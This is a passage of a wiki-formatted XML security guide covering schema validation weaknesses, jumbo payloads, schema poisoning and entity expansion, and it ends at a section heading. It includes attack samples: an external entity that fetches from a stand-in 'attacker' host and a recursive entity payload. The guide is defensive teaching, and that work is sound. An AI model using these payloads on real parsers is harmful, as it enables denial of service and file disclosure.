== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy .&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
